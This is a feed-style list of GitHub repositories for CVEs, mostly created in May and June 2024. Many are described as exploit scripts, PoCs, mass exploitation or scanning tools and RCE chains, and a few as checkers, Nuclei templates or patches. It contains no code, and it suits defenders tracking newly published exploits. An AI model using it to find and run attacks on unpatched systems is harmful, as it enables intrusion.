**CVE-2022-29464 exploit script** : [cc3305/CVE-2022-29464](https://github.com/cc3305/CVE-2022-29464) create time: 2024-06-07T22:17:05Z

**CVE-2022-26134 exploit script** : [cc3305/CVE-2022-26134](https://github.com/cc3305/CVE-2022-26134) create time: 2024-06-07T22:15:48Z

**no description** : [Yukiioz/CVE-2024-4577](https://github.com/Yukiioz/CVE-2024-4577) create time: 2024-06-07T20:10:49Z

**no description** : [nexblade12/CVE-2024-4577](https://github.com/nexblade12/CVE-2024-4577) create time: 2024-06-07T19:40:15Z

**no description** : [WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP](https://github.com/WanLiChangChengWanLiChang/CVE-2024-4577-RCE-EXP) create time: 2024-06-07T17:02:52Z

**Nuclei Template for CVE-2024-4577** : [Sysc4ll3r/CVE-2024-4577](https://github.com/Sysc4ll3r/CVE-2024-4577) create time: 2024-06-07T17:01:20Z

**The Porygon-Z that's super effective against Secure Boot! (CVE-2022-30203, CVE-2023-21560, CVE-2023-28269, CVE-2023-28249, and more...)** : [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk) create time: 2024-06-07T15:25:33Z

**no description** : [Wh02m1/CVE-2024-4577](https://github.com/Wh02m1/CVE-2024-4577) create time: 2024-06-07T12:49:20Z

**CVE-2024-24919 exploit that checks more files for better visibility** : [nullcult/CVE-2024-24919-Exploit](https://github.com/nullcult/CVE-2024-24919-Exploit) create time: 2024-06-07T12:14:19Z

**no description** : [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577) create time: 2024-06-07T10:58:57Z

**no description** : [huseyinstif/CVE-2024-4577-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-4577-Nuclei-Template) create time: 2024-06-07T10:40:37Z

**CVE-2024-4577** : [zjhzjhhh/CVE-2024-4577](https://github.com/zjhzjhhh/CVE-2024-4577) create time: 2024-06-07T09:53:32Z

**PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC** : [watchtowrlabs/CVE-2024-4577](https://github.com/watchtowrlabs/CVE-2024-4577) create time: 2024-06-07T09:52:54Z

**Nuclei Template for CVE-2024-4577** : [11whoami99/CVE-2024-4577](https://github.com/11whoami99/CVE-2024-4577) create time: 2024-06-07T09:51:39Z

**no description** : [princew88/CVE-2024-4577](https://github.com/princew88/CVE-2024-4577) create time: 2024-06-07T09:48:36Z

**PHP CGI Argument Injection (CVE-2024-4577) Remote Code Execution PoC** : [Junp0/CVE-2024-4577](https://github.com/Junp0/CVE-2024-4577) create time: 2024-06-07T09:42:40Z

**CVE-2024-4577** : [ohhhh693/CVE-2024-4577](https://github.com/ohhhh693/CVE-2024-4577) create time: 2024-06-07T09:42:31Z

**oracle weblogic** : [amacloudobia/CVE-2020-14883](https://github.com/amacloudobia/CVE-2020-14883) create time: 2024-06-07T08:50:53Z

**no description** : [huiwen-yayaya/CVE-2023-4863](https://github.com/huiwen-yayaya/CVE-2023-4863) create time: 2023-11-11T06:51:03Z

**no description** : [taida957789/CVE-2024-4577](https://github.com/taida957789/CVE-2024-4577) create time: 2024-06-07T06:19:25Z

**CVE-2024-4577 is a critical vulnerability in PHP affecting CGI configurations, allowing attackers to execute arbitrary commands via crafted URL parameters.** : [ATDanny/CVE-2024-4577](https://github.com/ATDanny/CVE-2024-4577) create time: 2024-06-07T05:50:23Z

**WordPress Automatic Plugin <= 3.92.0 - SQL Injection** : [Cappricio-Securities/CVE-2024-27956](https://github.com/Cappricio-Securities/CVE-2024-27956) create time: 2024-06-07T04:40:06Z

**no description** : [BTtea/CVE-2018-14714-POC](https://github.com/BTtea/CVE-2018-14714-POC) create time: 2024-06-07T01:19:10Z

**no description** : [alimuhammedkose/CVE-2024-32002-linux-smash](https://github.com/alimuhammedkose/CVE-2024-32002-linux-smash) create time: 2024-06-06T21:26:03Z

**no description** : [DigitalNinja00/CVE-2018-1335](https://github.com/DigitalNinja00/CVE-2018-1335) create time: 2024-06-06T21:02:24Z

**Exploiting XXE Vulnerabilities on Microsoft SharePoint Server and Cloud via Confused URL Parsing** : [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE) create time: 2024-06-06T18:31:57Z

**A script to exploit CVE-2020-1472 (Zerologon)** : [blackh00d/zerologon-poc](https://github.com/blackh00d/zerologon-poc) create time: 2024-06-06T16:44:38Z

**no description** : [conan-sudo/CVE-2019-14974-bypass](https://github.com/conan-sudo/CVE-2019-14974-bypass) create time: 2024-06-06T16:11:05Z

**A Simple Exploit Code(POC) to Automate CVE-2024–24919** : [starlox0/CVE-2024-24919-POC](https://github.com/starlox0/CVE-2024-24919-POC) create time: 2024-06-06T16:03:35Z

**no description** : [muhammad1596/CVE-2022-0847-DirtyPipe-Exploits](https://github.com/muhammad1596/CVE-2022-0847-DirtyPipe-Exploits) create time: 2024-06-06T14:27:41Z

**no description** : [tnishiox/cve-2023-4813](https://github.com/tnishiox/cve-2023-4813) create time: 2024-06-06T12:12:57Z

**sql延时注入poc** : [sammings/CVE-2024-32640](https://github.com/sammings/CVE-2024-32640) create time: 2024-06-06T08:56:34Z

**no description** : [WanLiChangChengWanLiChang/CVE-2024-25600](https://github.com/WanLiChangChengWanLiChang/CVE-2024-25600) create time: 2024-06-06T03:59:06Z

**no description** : [k3lpi3b4nsh33/CVE-2024-5084](https://github.com/k3lpi3b4nsh33/CVE-2024-5084) create time: 2024-06-06T03:25:44Z

**no description** : [k3lpi3b4nsh33/CVE-2024-25600](https://github.com/k3lpi3b4nsh33/CVE-2024-25600) create time: 2024-06-06T02:13:06Z

**This script will inform the user if the Confluence instance is vulnerable, but it will not proceed with the exploitation steps.** : [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check) create time: 2024-06-05T19:56:16Z

**Oracle WebLogic Server (LFI)** : [Cappricio-Securities/CVE-2022-21371](https://github.com/Cappricio-Securities/CVE-2022-21371) create time: 2024-06-05T16:29:16Z

**CVE-2017-8917 SQL injection Vulnerability in Joomla! 3.7.0 exploit** : [gloliveira1701/Joomblah](https://github.com/gloliveira1701/Joomblah) create time: 2024-06-05T16:07:51Z

**CVE-2024-4956 Python exploitation utility** : [fin3ss3g0d/CVE-2024-4956](https://github.com/fin3ss3g0d/CVE-2024-4956) create time: 2024-06-05T15:37:39Z

**Exploit script for WordPress Plugin Mail Masta 1.0 - CVE-2016-10956** : [Hackhoven/wp-mail-masta-exploit](https://github.com/Hackhoven/wp-mail-masta-exploit) create time: 2024-06-05T13:28:20Z

**CVE-2024-4295 Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via hash** : [truonghuuphuc/CVE-2024-4295-Poc](https://github.com/truonghuuphuc/CVE-2024-4295-Poc) create time: 2024-06-05T09:29:20Z

**CVE-2021-1675/CVE-2021-34527 PrintNightmare & CVE-2020-0668** : [0xSs0rZ/Windows_Exploit](https://github.com/0xSs0rZ/Windows_Exploit) create time: 2024-06-05T10:01:18Z

**no description** : [Sk1dr0wz/CVE-2024-4358_Mass_Exploit](https://github.com/Sk1dr0wz/CVE-2024-4358_Mass_Exploit) create time: 2024-06-05T01:05:12Z

**no description** : [Harydhk7/CVE-2024-4358](https://github.com/Harydhk7/CVE-2024-4358) create time: 2024-06-04T16:07:36Z

**no description** : [muhammad1596/CVE-2022-0847-dirty-pipe-checker](https://github.com/muhammad1596/CVE-2022-0847-dirty-pipe-checker) create time: 2024-06-04T13:25:04Z

**no description** : [xh4vm/CVE-2024-21683](https://github.com/xh4vm/CVE-2024-21683) create time: 2024-06-04T12:00:00Z

**An Vulnerability detection and Exploitation tool for CVE-2024-4358** : [RevoltSecurities/CVE-2024-4358](https://github.com/RevoltSecurities/CVE-2024-4358) create time: 2024-06-04T11:32:59Z

**no description** : [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547) create time: 2024-06-04T10:01:41Z

**no description** : [kjdfklha/CVE-2024-2961_poc](https://github.com/kjdfklha/CVE-2024-2961_poc) create time: 2024-06-04T09:57:46Z

**no description** : [tnishiox/cve-2024-2961](https://github.com/tnishiox/cve-2024-2961) create time: 2024-06-04T08:05:09Z

**no description** : [Tim-Hoekstra/CVE-2024-24919](https://github.com/Tim-Hoekstra/CVE-2024-24919) create time: 2024-06-04T04:29:35Z

**Prebuilt binaries for Privilege Escalation in Oracle VM Virtual box prior to 7.0.16** : [x0rsys/CVE-2024-21111](https://github.com/x0rsys/CVE-2024-21111) create time: 2024-06-04T04:24:47Z

**no description** : [0xans/CVE-2024-24919](https://github.com/0xans/CVE-2024-24919) create time: 2024-06-04T02:53:22Z

**Modified the PoC CVE-2021-31630 script by Fellipe Oliveira for HTB** : [junnythemarksman/CVE-2021-31630](https://github.com/junnythemarksman/CVE-2021-31630) create time: 2024-06-04T00:44:47Z

**This repository contains a C program to test for CVE-2024-2961, a buffer overflow vulnerability in the iconv() function of glibc.** : [exfil0/test_iconv](https://github.com/exfil0/test_iconv) create time: 2024-06-03T23:53:43Z

**exploit code** : [EmadYaY/CVE-2022-36779](https://github.com/EmadYaY/CVE-2022-36779) create time: 2024-06-03T22:25:31Z

**no description** : [kevcooper/CVE-2024-1086-checker](https://github.com/kevcooper/CVE-2024-1086-checker) create time: 2024-06-03T22:04:03Z

**CVE-2023-51518: Preauthenticated Java Deserialization via JMX in Apache James** : [mbadanoiu/CVE-2023-51518](https://github.com/mbadanoiu/CVE-2023-51518) create time: 2024-06-03T19:48:53Z

**no description** : [kljunowsky/CVE-2024-27348](https://github.com/kljunowsky/CVE-2024-27348) create time: 2024-06-03T19:08:24Z

**New exploit for Apache APISIX 2.12.1 - Remote Code Execution (RCE)** : [btar1gan/exploit_CVE-2022-24112](https://github.com/btar1gan/exploit_CVE-2022-24112) create time: 2024-06-03T17:33:59Z

**Nmap script to check vulnerability CVE-2024-24919** : [GuayoyoCyber/CVE-2024-24919](https://github.com/GuayoyoCyber/CVE-2024-24919) create time: 2024-06-03T18:17:45Z

**Apache OFBIZ Path traversal leading to RCE POC** : [Mr-xn/CVE-2024-32113](https://github.com/Mr-xn/CVE-2024-32113) create time: 2024-06-03T15:57:59Z

**Mitel Collab Local Privilege Escalation CVE-2024-35315 PoC** : [ewilded/CVE-2024-35315-POC](https://github.com/ewilded/CVE-2024-35315-POC) create time: 2024-06-03T14:29:35Z

**EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure** : [Cappricio-Securities/CVE-2024-0235](https://github.com/Cappricio-Securities/CVE-2024-0235) create time: 2024-06-03T14:21:48Z

**no description** : [0nin0hanz0/CVE-2024-24919-PoC](https://github.com/0nin0hanz0/CVE-2024-24919-PoC) create time: 2024-06-03T13:30:31Z

**no description** : [Rug4lo/CVE-2024-24919-Exploit](https://github.com/Rug4lo/CVE-2024-24919-Exploit) create time: 2024-06-03T12:18:35Z

**CVE-2024-34832** : [julio-cfa/CVE-2024-34832](https://github.com/julio-cfa/CVE-2024-34832) create time: 2024-05-14T19:15:31Z

**Progress Telerik Report Server pre-authenticated RCE chain (CVE-2024-4358/CVE-2024-1800)** : [sinsinology/CVE-2024-4358](https://github.com/sinsinology/CVE-2024-4358) create time: 2024-06-03T08:22:10Z

**no description** : [birdlex/cve-2024-24919-checker](https://github.com/birdlex/cve-2024-24919-checker) create time: 2024-06-03T08:39:09Z

**CVE-2008-4250 Conficker** : [pxcs/CVE-29343-Sysmon-list](https://github.com/pxcs/CVE-29343-Sysmon-list) create time: 2024-04-11T15:27:50Z

**Sonatype Nexus Repository Manager 3 (LFI)** : [Cappricio-Securities/CVE-2024-4956](https://github.com/Cappricio-Securities/CVE-2024-4956) create time: 2024-06-03T02:49:20Z

**CVE-2021-41773.py** : [Maybe4a6f7365/CVE-2021-41773](https://github.com/Maybe4a6f7365/CVE-2021-41773) create time: 2024-06-02T23:43:35Z

**Exploit created by nu11secur1ty (https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)** : [junnythemarksman/CVE-2022-37706](https://github.com/junnythemarksman/CVE-2022-37706) create time: 2024-06-03T01:17:04Z

**CVE-2024-24919** : [SpeedyQweku/CVE-2024-24919](https://github.com/SpeedyQweku/CVE-2024-24919) create time: 2024-06-02T21:16:27Z

**CVE-2024-24919 Sniper - A powerful tool for scanning Check Point Security Gateway CVE-2024-24919 vulnerability. Supports single & bulk scanning, multithreading, and generates detailed CSV reports. Ideal for penetration testers and security researchers.** : [bigb0x/CVE-2024-24919-Sniper](https://github.com/bigb0x/CVE-2024-24919-Sniper) create time: 2024-06-02T20:16:22Z

**phpMyAdmin <4.9.0 - Cross-Site Request Forgery** : [Cappricio-Securities/CVE-2019-12616](https://github.com/Cappricio-Securities/CVE-2019-12616) create time: 2024-06-02T15:50:16Z

**Chrome Renderer 1day RCE via Type Confusion in Async Stack Trace (v8ctf submission)** : [kaist-hacking/CVE-2023-6702](https://github.com/kaist-hacking/CVE-2023-6702) create time: 2024-06-02T14:15:27Z

**a Proof of Concept of CVE-2024-24919** : [Expl0itD0g/CVE-2024-24919---Poc](https://github.com/Expl0itD0g/CVE-2024-24919---Poc) create time: 2024-06-02T13:58:36Z

**no description** : [B1naryo/CVE-2024-24919-POC](https://github.com/B1naryo/CVE-2024-24919-POC) create time: 2024-06-02T13:09:51Z

**no description** : [adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC](https://github.com/adyanamul/Remote-Code-Execution-RCE-Exploit-BlueKeep-CVE-2019-0708-PoC) create time: 2024-06-02T12:03:12Z

**0BL1V10N's CVE-2024-25600 for Bricks Builder (TryHackMe) plugin for WordPress exploit** : [0bl1v10nf0rg0773n/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress](https://github.com/0bl1v10nf0rg0773n/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress) create time: 2024-06-02T10:49:03Z

**none** : [Basyaact/CVE-2024-32002-PoC_Chinese](https://github.com/Basyaact/CVE-2024-32002-PoC_Chinese) create time: 2024-06-01T20:19:05Z

**no description** : [mr-kasim-mehar/CVE-2024-24919](https://github.com/mr-kasim-mehar/CVE-2024-24919) create time: 2024-06-02T08:19:50Z

**no description** : [J4F9S5D2Q7/CVE-2024-24919](https://github.com/J4F9S5D2Q7/CVE-2024-24919) create time: 2024-06-02T06:17:06Z

**This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.** : [omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection](https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection) create time: 2024-06-01T21:33:51Z

**https://www.cve.org/CVERecord?id=CVE-2024-32002** : [tobelight/cve_2024_32002](https://github.com/tobelight/cve_2024_32002) create time: 2024-06-01T12:27:50Z

**no description** : [tobelight/cve_2024_32002_hook](https://github.com/tobelight/cve_2024_32002_hook) create time: 2024-06-01T12:25:04Z

**Herramienta de explotación para explotar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall** : [r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN](https://github.com/r4p3c4/CVE-2024-24919-Exploit-PoC-Checkpoint-Firewall-VPN) create time: 2024-06-01T12:02:43Z

**Esta herramienta se utiliza para validar la vulnerabilidad CVE-2024-24919 en las VPN de Checkpoint Firewall** : [r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check](https://github.com/r4p3c4/CVE-2024-24919-Checkpoint-Firewall-VPN-Check) create time: 2024-06-01T11:54:39Z

**CVE-2024-24919 [Check Point Security Gateway Information Disclosure]** : [ifconfig-me/CVE-2024-24919-Bulk-Scanner](https://github.com/ifconfig-me/CVE-2024-24919-Bulk-Scanner) create time: 2024-06-01T10:51:14Z

**Mass scanner for CVE-2024-24919** : [YN1337/CVE-2024-24919](https://github.com/YN1337/CVE-2024-24919) create time: 2024-06-01T09:54:13Z

**no description** : [w1n-gl0ry/CVE-2021-21225](https://github.com/w1n-gl0ry/CVE-2021-21225) create time: 2024-06-01T05:35:39Z

**Exploit for CVE-2019-7609 in python** : [Akshay15-png/CVE-2019-7609](https://github.com/Akshay15-png/CVE-2019-7609) create time: 2024-06-01T05:10:58Z

**CVE-2024-5326 Post Grid Gutenberg Blocks and WordPress Blog Plugin – PostX <= 4.1.2 - Missing Authorization to Arbitrary Options Update** : [truonghuuphuc/CVE-2024-5326-Poc](https://github.com/truonghuuphuc/CVE-2024-5326-Poc) create time: 2024-06-01T04:23:54Z

**no description** : [gurudattch/CVE-2024-24919](https://github.com/gurudattch/CVE-2024-24919) create time: 2024-06-01T03:26:29Z

**no description** : [nicolvsrlr27/CVE-2024-24919](https://github.com/nicolvsrlr27/CVE-2024-24919) create time: 2024-06-01T03:05:35Z

**no description** : [fernandobortotti/CVE-2024-24919](https://github.com/fernandobortotti/CVE-2024-24919) create time: 2024-06-01T02:20:28Z

**Check Point Security Gateway (LFI)** : [Cappricio-Securities/CVE-2024-24919](https://github.com/Cappricio-Securities/CVE-2024-24919) create time: 2024-06-01T01:33:00Z

**no description** : [seed1337/CVE-2024-24919-POC](https://github.com/seed1337/CVE-2024-24919-POC) create time: 2024-05-31T11:52:59Z

**javamelody/javamelody with CVE-2013-4378** : [epicosy/VUL4J-50](https://github.com/epicosy/VUL4J-50) create time: 2024-05-31T21:31:15Z

**jhy/jsoup with CVE-2015-6748** : [epicosy/VUL4J-59](https://github.com/epicosy/VUL4J-59) create time: 2024-05-31T21:24:39Z

**no description** : [MohamedWagdy7/CVE-2024-24919](https://github.com/MohamedWagdy7/CVE-2024-24919) create time: 2024-05-31T22:07:21Z

**nahsra/antisamy with CVE-2016-10006** : [epicosy/VUL4J-60](https://github.com/epicosy/VUL4J-60) create time: 2024-05-31T21:12:16Z

**apache/sling with CVE-2016-5394** : [epicosy/VUL4J-23](https://github.com/epicosy/VUL4J-23) create time: 2024-05-31T21:05:46Z

**ratpack with CVE-2019-17513** : [epicosy/Ratpack-1](https://github.com/epicosy/Ratpack-1) create time: 2024-05-31T20:26:56Z

**xstream with CVE-2020-26217** : [epicosy/XStream-1](https://github.com/epicosy/XStream-1) create time: 2024-05-31T20:52:08Z

**retrofit with CVE-2018-1000844** : [epicosy/Retrofit-1](https://github.com/epicosy/Retrofit-1) create time: 2024-05-31T20:09:00Z

**quartz with CVE-2019-13990** : [epicosy/Quartz-1](https://github.com/epicosy/Quartz-1) create time: 2024-05-31T20:17:54Z

**HugeGraph Server RCE Scanner ( CVE-2024-27348 )** : [Zeyad-Azima/CVE-2024-27348](https://github.com/Zeyad-Azima/CVE-2024-27348) create time: 2024-05-31T20:11:37Z

**This project is intended to serve as a proof of concept to demonstrate exploiting the vulnerability in the PDF.js (pdfjs-dist) library reported in CVE-2024-4367** : [clarkio/pdfjs-vuln-demo](https://github.com/clarkio/pdfjs-vuln-demo) create time: 2024-05-22T23:18:20Z

**no description** : [un9nplayer/CVE-2024-24919](https://github.com/un9nplayer/CVE-2024-24919) create time: 2024-05-31T18:14:19Z

**no description** : [nexblade12/CVE-2024-24919](https://github.com/nexblade12/CVE-2024-24919) create time: 2024-05-31T17:41:08Z

**Exploit tool to validate CVE-2024-24919 vulnerability on Checkpoint Firewall VPNs** : [GlobalsecureAcademy/CVE-2024-24919](https://github.com/GlobalsecureAcademy/CVE-2024-24919) create time: 2024-05-31T17:14:48Z

**Linux Glibc 函数库漏洞分析(CVE-2015-7547)** : [MRC6666/CVE-2015-7547](https://github.com/MRC6666/CVE-2015-7547) create time: 2024-05-31T15:21:35Z

**CVE-2024-24919 exploit** : [GoatSecurity/CVE-2024-24919](https://github.com/GoatSecurity/CVE-2024-24919) create time: 2024-05-31T13:11:40Z

**Nuclei template for CVE-2024-24919** : [smackerdodi/CVE-2024-24919-nuclei-templater](https://github.com/smackerdodi/CVE-2024-24919-nuclei-templater) create time: 2024-05-31T12:33:34Z

**no description** : [Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN](https://github.com/Praison001/CVE-2024-24919-Check-Point-Remote-Access-VPN) create time: 2024-05-31T12:10:05Z

**no description** : [0x3f3c/CVE-2024-24919](https://github.com/0x3f3c/CVE-2024-24919) create time: 2024-05-31T12:08:28Z

**no description** : [Vulnpire/CVE-2024-24919](https://github.com/Vulnpire/CVE-2024-24919) create time: 2024-05-31T11:29:03Z

**DLL Injection and CVE-2010-3124** : [KOBUKOVUI/DLL_Injection_On_VLC](https://github.com/KOBUKOVUI/DLL_Injection_On_VLC) create time: 2024-05-31T10:34:40Z

**An Vulnerability detection and Exploitation tool for CVE-2024-24919** : [RevoltSecurities/CVE-2024-24919](https://github.com/RevoltSecurities/CVE-2024-24919) create time: 2024-05-31T10:18:36Z

**no description** : [3UR/CVE-2024-24919](https://github.com/3UR/CVE-2024-24919) create time: 2024-05-31T09:43:14Z

**no description** : [Zhang-Yiiliin/test_cve_2024_32002](https://github.com/Zhang-Yiiliin/test_cve_2024_32002) create time: 2024-05-31T08:10:39Z

**no description** : [satriarizka/CVE-2024-24919](https://github.com/satriarizka/CVE-2024-24919) create time: 2024-05-31T08:01:13Z

**Simple POC Python script that check & leverage Check Point CVE-2024-24919 vulnerability (Wrong Check Point)** : [zam89/CVE-2024-24919](https://github.com/zam89/CVE-2024-24919) create time: 2024-05-31T07:59:17Z

**CVE-2024-5522 HTML5 Video Player <= 2.5.26 - Unauthenticated SQL Injection** : [truonghuuphuc/CVE-2024-5522-Poc](https://github.com/truonghuuphuc/CVE-2024-5522-Poc) create time: 2024-05-31T04:41:46Z

**cve-2024-32002yahhh** : [AD-Appledog/wakuwaku](https://github.com/AD-Appledog/wakuwaku) create time: 2024-05-31T02:45:44Z

**CVE-2024-32002wakuwaku** : [AD-Appledog/CVE-2024-32002](https://github.com/AD-Appledog/CVE-2024-32002) create time: 2024-05-31T02:40:31Z

**Ivanti ICS - Authentication Bypass** : [Cappricio-Securities/CVE-2023-46805](https://github.com/Cappricio-Securities/CVE-2023-46805) create time: 2024-05-31T02:18:57Z

**jooby with CVE-2019-15477** : [epicosy/jooby](https://github.com/epicosy/jooby) create time: 2024-05-31T00:09:01Z

**json-sanitizer with CVE-2020-13973** : [epicosy/json-sanitizer](https://github.com/epicosy/json-sanitizer) create time: 2024-05-31T00:16:57Z

**El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604)** : [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604) create time: 2024-05-31T00:38:47Z

**no description** : [jsebastianherrera/CVE-2024-24919](https://github.com/jsebastianherrera/CVE-2024-24919) create time: 2024-05-31T01:14:19Z

**no description** : [am-eid/CVE-2024-24919](https://github.com/am-eid/CVE-2024-24919) create time: 2024-05-30T23:52:53Z

**A proof of concept for the git vulnerability CVE-2024-32002** : [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002) create time: 2024-05-17T15:35:50Z

**Quick and simple script that takes as input a file with multiple URLs to check for the CVE-2024-24919 vulnerability in CHECKPOINT** : [Bytenull00/CVE-2024-24919](https://github.com/Bytenull00/CVE-2024-24919) create time: 2024-05-30T20:14:19Z

**LearnDash LMS < 4.10.3 - Sensitive Information Exposure** : [Cappricio-Securities/CVE-2024-1208](https://github.com/Cappricio-Securities/CVE-2024-1208) create time: 2024-05-30T17:55:45Z

**no description** : [eoslvs/CVE-2024-24919](https://github.com/eoslvs/CVE-2024-24919) create time: 2024-05-30T17:26:08Z

**CVE-2024-24919 PoC** : [LucasKatashi/CVE-2024-24919](https://github.com/LucasKatashi/CVE-2024-24919) create time: 2024-05-30T16:23:18Z

**no description** : [hendprw/CVE-2024-24919](https://github.com/hendprw/CVE-2024-24919) create time: 2024-05-30T15:40:11Z

**no description** : [Laihoang2k3/CVE_2019_14271](https://github.com/Laihoang2k3/CVE_2019_14271) create time: 2024-05-30T14:34:07Z

**POC exploit for CVE-2024-24919 information leakage** : [emanueldosreis/CVE-2024-24919](https://github.com/emanueldosreis/CVE-2024-24919) create time: 2024-05-30T14:41:32Z

**no description** : [B1ackCat/cve-2016-5195-DirtyCOW](https://github.com/B1ackCat/cve-2016-5195-DirtyCOW) create time: 2024-05-30T13:42:09Z

**Bash script to patch for CVE-2024-2961** : [absolutedesignltd/iconvfix](https://github.com/absolutedesignltd/iconvfix) create time: 2024-05-30T13:45:43Z

**no description** : [TanMolk/CVE-2024-32002](https://github.com/TanMolk/CVE-2024-32002) create time: 2024-05-30T11:01:15Z

**no description** : [TanMolk/CVE-2024-32002-sub](https://github.com/TanMolk/CVE-2024-32002-sub) create time: 2024-05-30T10:58:17Z

**Microsoft FrontPage Extensions Check (shtml.dll)** : [Cappricio-Securities/CVE-2000-0114](https://github.com/Cappricio-Securities/CVE-2000-0114) create time: 2024-05-30T09:55:41Z

**no description** : [TanMolk/CVE-2024-32002-sub](https://github.com/TanMolk/CVE-2024-32002-sub) create time: 2024-05-30T09:46:46Z

**no description** : [TanMolk/CVE-2024-32002](https://github.com/TanMolk/CVE-2024-32002) create time: 2024-05-30T09:45:09Z

**no description** : [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489) create time: 2024-05-30T07:20:09Z

**Exploit for CVE-2024-4956 affecting all previous Sonatype Nexus Repository 3.x OSS/Pro versions up to and including 3.68.0** : [Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager](https://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager) create time: 2024-05-30T08:04:27Z

**Nuclei Template to discover CVE-2024-24919. A path traversal vulnerability in CheckPoint SSLVPN.** : [c3rrberu5/CVE-2024-24919](https://github.com/c3rrberu5/CVE-2024-24919) create time: 2024-05-30T07:55:53Z

**no description** : [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489) create time: 2024-05-30T07:08:28Z

**no description** : [kovatechy/cve202329489](https://github.com/kovatechy/cve202329489) create time: 2024-05-30T06:13:28Z

**no description** : [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489) create time: 2024-05-30T06:07:47Z

**CVE-2024-32002 poc test** : [431m/rcetest](https://github.com/431m/rcetest) create time: 2024-05-30T06:08:33Z

**CVE-2024-3293 rtMedia for WordPress, BuddyPress and bbPress <= 4.6.18 - Authenticated (Contributor+) SQL Injection via rtmedia_gallery Shortcode** : [truonghuuphuc/CVE-2024-3293-Poc](https://github.com/truonghuuphuc/CVE-2024-3293-Poc) create time: 2024-05-30T04:51:32Z

**CVE-2024-35469 | SQL injection** : [dovankha/CVE-2024-35469](https://github.com/dovankha/CVE-2024-35469) create time: 2024-05-11T07:27:31Z

**CVE-2024-35468 | SQL injection** : [dovankha/CVE-2024-35468](https://github.com/dovankha/CVE-2024-35468) create time: 2024-05-11T05:23:41Z

**Эксплойт для уязвимости CVE-2024-0039 на Android, который позволяет выполнять произвольный код через MP4 файл. Этот репозиторий создан для образовательных целей. Используйте его с осторожностью и ответственностью.** : [41yn14/CVE-2024-0039-Exploit](https://github.com/41yn14/CVE-2024-0039-Exploit) create time: 2024-05-29T22:13:04Z

**𓃌 - htmlLawed 1.2.5 Remote code Execution** : [0romos/CVE-2022-35914](https://github.com/0romos/CVE-2022-35914) create time: 2024-05-29T19:54:15Z

**CVE-2020-5377: Dell OpenManage Server Administrator File Read** : [c0d3cr4f73r/CVE-2020-5377](https://github.com/c0d3cr4f73r/CVE-2020-5377) create time: 2024-05-29T17:01:16Z

**CVE-2023-46604 (Apache ActiveMQ RCE Vulnerability) and focused on getting Indicators of Compromise.** : [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs) create time: 2024-05-29T14:56:41Z

**CVE-2023–43622** : [visudade/CVE-2023-43622](https://github.com/visudade/CVE-2023-43622) create time: 2024-05-29T13:04:29Z

**CVE-2023-22726** : [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726) create time: 2024-05-29T10:38:30Z

**Proof-Of-Concept (POC) for CVE-2024-4956** : [TypicalModMaker/CVE-2024-4956](https://github.com/TypicalModMaker/CVE-2024-4956) create time: 2024-05-28T21:20:53Z

**no description** : [rootkalilocalhost/CVE-2022-0995](https://github.com/rootkalilocalhost/CVE-2022-0995) create time: 2024-05-29T05:36:11Z

**no description** : [rootkalilocalhost/CVE-2023-32233](https://github.com/rootkalilocalhost/CVE-2023-32233) create time: 2024-05-29T05:44:11Z

**WordPress Page Builder KingComposer <=2.9.6 - Open Redirect** : [Cappricio-Securities/CVE-2022-0165](https://github.com/Cappricio-Securities/CVE-2022-0165) create time: 2024-05-29T04:00:25Z

**confluence rce (CVE-2021-26084, CVE-2022-26134, CVE-2023-22527)** : [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE) create time: 2024-05-29T03:20:22Z

**no description** : [rootkalilocalhost/CVE-2024-1086](https://github.com/rootkalilocalhost/CVE-2024-1086) create time: 2024-05-29T04:18:14Z

**no description** : [SnoopyTools/Rootkit-cve2024](https://github.com/SnoopyTools/Rootkit-cve2024) create time: 2024-05-28T23:56:22Z

**Prova de conceito para PHP CGI Argument Injection (CVE-2012-1823)** : [Fatalitysec/CVE-2012-1823](https://github.com/Fatalitysec/CVE-2012-1823) create time: 2024-05-28T18:36:21Z

**POC iteration for CVE-2024-23108** : [hitem/CVE-2024-23108](https://github.com/hitem/CVE-2024-23108) create time: 2024-05-28T17:21:11Z

**CVE-2024-4956 : Nexus Repository Manager 3 poc exploit** : [GoatSecurity/CVE-2024-4956](https://github.com/GoatSecurity/CVE-2024-4956) create time: 2024-05-28T15:05:31Z

